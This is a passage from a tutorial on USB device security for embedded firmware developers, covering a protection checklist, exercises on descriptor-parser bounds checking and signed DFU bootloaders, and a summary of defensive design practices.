VBUS Hardware Protection Critical TVS diode (D+/D-) + polyfuse (VBUS) + protection IC (TI TPD4S012) ESD gun test, USB Killer test on prototype hardware
Descriptor Length Validation Critical Bounds-checked descriptor parser, watchdog on assertion failure Fuzzing with usbfuzz tool, code review of parser
Signed DFU Firmware Critical ECDSA P-256 signature verification before flash write, STALL on failure Attempt upload of unsigned binary — must be rejected
RDP Level 2 in Production Critical Set during manufacturing finalization step via option bytes Attempt JTAG/SWD connection — must fail
USB Device Whitelist Policy High Document VID/PID in product security guide for enterprise IT Confirm device passes USBGuard policy on customer reference platform
No BOOT0 External in Production High BOOT0 pin tied to GND via 10 kΩ, no external access point PCB review — verify no test point or header on BOOT0
Host Input Validation High All BULK/INTERRUPT/CONTROL payloads validated for length before use Fuzzing with Wireshark + modified host driver sending oversized payloads
Firmware Version Rollback Protection High Monotonic version counter in OTP flash, reject downgrade in bootloader Attempt to flash older signed firmware — must be rejected
AES Firmware Encryption (if applicable) Medium AES-128-CBC with key in OTP or ATECC608A secure element Capture DFU upload traffic — confirm ciphertext (no plaintext constants)
Watchdog Timer Active Medium IWDG configured with 200 ms timeout, kicked in USB task loop Halt USB task in debugger — device should reset within timeout
Audit Logging (optional) Low Log DFU attempts, failed signature checks, and rate-limit triggers to EEPROM Review log after intentional failed DFU attempt

Practical Exercises

These exercises apply the USB security concepts from this article to real firmware and hardware. Each exercise is designed to produce a verifiable, testable result — not just conceptual understanding.

Exercise 1 Beginner

Implement a USB Security Audit Using the Tool Below

Take a USB device project you have worked on (from any earlier part of this series) and fill out the USB Security Audit form below. For each security item, honestly assess whether your current firmware and hardware design meets the requirement. Pay particular attention to DFU signing status, VBUS protection, and RDP level. The completed document becomes your security requirements backlog — assign completion dates and owners for each unaddressed item.

Security Audit Requirements Risk Assessment
Exercise 2 Intermediate

Add Bounds Checking to a TinyUSB Descriptor Parser

Take a TinyUSB project (CDC or HID from Parts 6 or 7) and write a unit test that calls the configuration descriptor parser directly with intentionally malformed inputs: (a) a wTotalLength value of 0xFFFF with only 64 bytes of actual descriptor data, (b) a bNumInterfaces value of 10 in a configuration with only 1 interface, (c) an interface descriptor with bLength set to 1. Verify that your parser handles each case without a buffer overflow — add bounds checking where it is missing. Run the test with AddressSanitizer enabled (-fsanitize=address) if compiling on a Linux host for maximum coverage of boundary violations.

Descriptor Fuzzing Buffer Overflow Unit Testing AddressSanitizer
Exercise 3 Advanced

Implement a Complete Signed DFU Bootloader

Implement a complete secure DFU bootloader for an STM32F4 or RP2040 target. Requirements: (a) the bootloader occupies the first 32 KB of flash (0x08000000–0x08007FFF on STM32), (b) the application starts at 0x08008000, (c) the bootloader enters DFU mode if the magic word 0xDEADC0DE is present in the first word of SRAM at reset, or if a button is held, (d) DFU upload is received into a staging area in the second half of flash, (e) after download completes the bootloader verifies the ECDSA P-256 signature using the micro-ecc library, (f) on success the application region is erased and the new firmware is written, (g) on failure a DFU_STATUS_ERR_VENDOR is returned and no flash write occurs. Test by signing a minimal LED blink firmware and uploading it via dfu-util.

Secure Boot ECDSA DFU Bootloader STM32 micro-ecc

USB Security Audit Generator

Use this tool to document your USB device's security posture — project details, MCU, RDP level, DFU signing status, VBUS protection, and host input validation. Download as Word, Excel, PDF, or PowerPoint for security review or compliance documentation.

USB Security Audit Generator

Document your USB device security configuration for review and export. All data stays in your browser — nothing is sent to any server.

Draft auto-saved

All data stays in your browser. Nothing is sent to or stored on any server.

Conclusion & Next Steps

USB security is not an afterthought — it is a design discipline that must be considered from the first schematic revision and the first line of bootloader code. In this article we covered the complete USB security landscape for embedded device developers:

  • The USB attack surface is bidirectional: devices can attack hosts (BadUSB/HID injection) and hosts can attack devices (descriptor fuzzing, malicious DFU). Both directions require deliberate defensive design.
  • USB Killer is a hardware-level attack with no software mitigation. TVS diodes, polyfuses, and dedicated protection ICs like the TI TPD4S012 are mandatory for production hardware exposed to untrusted USB ports.
  • Descriptor fuzzing defense requires bounds checking in every descriptor parser path, tested with tools like usbfuzz before production release.
  • Secure DFU with ECDSA P-256 firmware signing is the single most important security feature for any USB device that supports firmware updates. An unsigned DFU port is an attacker's dream: a USB-accessible backdoor to full firmware control.
  • Firmware encryption with AES-128-CBC, combined with signing (encrypt-then-sign), protects firmware confidentiality as well as integrity. Keys must be stored in OTP, secure elements, or TrustZone-protected memory.
  • RDP Level 2 on STM32 (or equivalent on other MCUs) permanently disables debug access and is the required final step in production manufacturing for any security-sensitive device.
  • Host input validation treats all host-provided data as potentially malicious: validate all lengths, reject unknown command codes, implement rate limiting, and maintain a watchdog for recovery from protocol attacks.

Next in the Series — The Final Part

In Part 17: USB Hardware Design — the final part of this series — we move from firmware to the physical world and design production-quality USB hardware from the ground up. We will cover connector selection and USB-C orientation detection, impedance-controlled differential pair routing for both FS and HS USB, crystal and HSI48 clock selection, ESD and overvoltage protection circuits, USB hub design with the SMSC USB2514B, USB-C Power Delivery hardware, PCB stackup for EMC compliance, and a complete production hardware design checklist. This is the article that brings together everything in the series into a complete, shippable USB product.

Technology